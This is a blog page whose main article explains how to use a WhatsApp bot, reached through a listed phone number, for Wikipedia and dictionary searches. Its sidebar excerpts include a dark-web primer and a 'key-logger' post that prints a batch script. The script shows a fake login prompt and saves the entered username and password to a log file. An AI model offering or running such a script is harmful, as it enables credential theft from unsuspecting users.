Skip to main content

How to Use WhatsApp as Search Engine and Wikipedia



How to Use WhatsApp as Search Engine and Wikipedia: The instant messaging app, WhatsApp is now being used by millions of people worldwide. People use WhatsApp to stay in touch with their families & friends. We can share multimedia files with the help of WhatsApp.WhatsApp is introducing lots of features to make it more user-friendly. Just a few days ago, we have seen WhatsApp launched “Delete For Everyone” feature that lets users delete the sent messages within 7 minutes.



In this article, we are going to share another awesome WhatsApp trick that will help you to bring search engine like feature to the instant messaging app. We are going to share a trick that will help you to create a WhatsApp bot that actually acts as a search engine.

1) You need to create a contact on your phone with any name and add this number: +91-7397682861 (You can find complete list of numbers from here)


2) Now launch the WhatsApp app and then create a group. Add the newly created contact to the group and your WhatsApp bot will be ready to use.

Using the WhatsApp bot is really easy. For Wikipedia search, you need to type Wiki SEARCHTERM and then send to the group. It will give you information regarding your search term.


Few Codes:

  • Join English News Channel: Send +NEWS to the group
  • Dictionary search: Send +DICT WORD to the group (Replace WORD with your sentence)
  • Join Cricket, Football channel: Send +CRICKET or +FOOTBALL to the group
  • To Play quiz: Send +GK to the group.
There are lot more codes you can apply on the WhatsApp bot, for the complete list of codes visit this link.
This is how you can use WhatsApp as a search engine. Hope this article helped you share it as much as possible.



Comments

Popular posts from this blog

A beginner’s guide to the dark web

What is the dark web? There are basically three parts to the world wide web: surface web, deep web, and dark web. The surface web is everything that’s publicly available and accessible through search or typing a URL into your browser. The deep web , also known as the invisible web, is all the content on the web that is not indexed by standard search engines, such as email clients, online banking websites, or pages that are inaccessible to crawlers, the software that indexes the web for search engines. Some of those pages can still be accessed if you have the URL while others require you to have login credentials. According to expert estimates, the deep web is 500 times larger than the surface web. The dark web, however, is a totally different beast—a tiny fraction of the web that is only accessible through specialized software such as the Tor browser. However, the term “dark web” is also often used to refer to the darknet, the overlay networks that are used to an...

How to Create a key-logger?

The key-logger is one of the oldest tools in the world of hacking, but despite this, it is still effective. Next ,i'm going to show you how to create key-logger in a simple way, using notepad. What is Key-logger?  A key-logger is a type of spyware that records all keystrokes on victims computer secretly. Key-logger are widely used by cyber-criminals to obtain information on bank accounts and credit cards, data such as usernames, passwords, and other personal information . HOW TO MAKE A KEY-LOGGER?  Here is a basic key-logger script for beginners to understand the basics of how key-logging works in notepad. Open notepad on your Windows and paste the script given below. @echo off  color a title Login cls echo Please Enter Your Email Address and Password echo. echo. cd C:\Logs set /p user= Username: set /p pass=Password: echo Username="%user%" Password="%pass%" Log.txt start http://TechiViewer.com/ exit ...

How to upload a image in Google

Here we are going to see how to upload a image on Google Goto Google  Click on images. Now you will get a web page having images tag under Google. On the Google search box you will see a camera icon and just click then choose your file to upload . Now your image is uploaded on Google. Thanks for viewing this post